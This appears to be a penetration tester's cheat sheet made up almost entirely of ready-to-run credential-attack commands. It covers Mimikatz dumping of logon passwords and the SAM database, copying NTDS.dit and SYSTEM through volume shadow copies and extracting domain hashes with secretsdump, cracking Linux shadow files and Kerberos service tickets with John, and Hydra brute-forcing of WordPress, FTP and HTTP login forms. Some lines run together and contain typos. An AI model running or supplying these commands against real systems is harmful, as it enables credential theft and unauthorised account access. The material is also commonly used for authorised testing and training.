mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"
#windows sam format
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::crunch 11 11 IAmNumber%%#Copy NTDS.dit and SYSTEM for recover the hashes
vssadmin.exe create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit <dest>
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM <dest>
#recover hashes
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL -o hashesunix passowrd
#crack linux shadow file
unshadow /etc/passwd /etc/shadow > hash && john --wordlist=/usr/share/wordlists/rockyou.txt hash
#crack SPN's password
#need to get TGS first(See domain enumeration in win_EoP.md)
kirbi2john.py mssql.kirbi > mssql_tgs.john
john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt mssql_tgs.john
wordpress
#wp-login
hydra -L lists/usrname.txt -P lists/pass.txt <target> -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
#ftp
hydra -t 1 -l kaitlyn -P /usr/share/wordlists/wfuzz/others/common_pass.txt -vV <target> ftp
#http basic auth
hydra -l admin -P /usr/share/wordlists/wfuzz/others/common_pass.txt -s 8443 127.0.0.1 http-get /admin -vvvhttps://linuxconfig.org/test-wordpress-logins-with-hydra-on-kali-linux https://www.hackingarticles.in/multiple-ways-to-exploiting-http-authentication/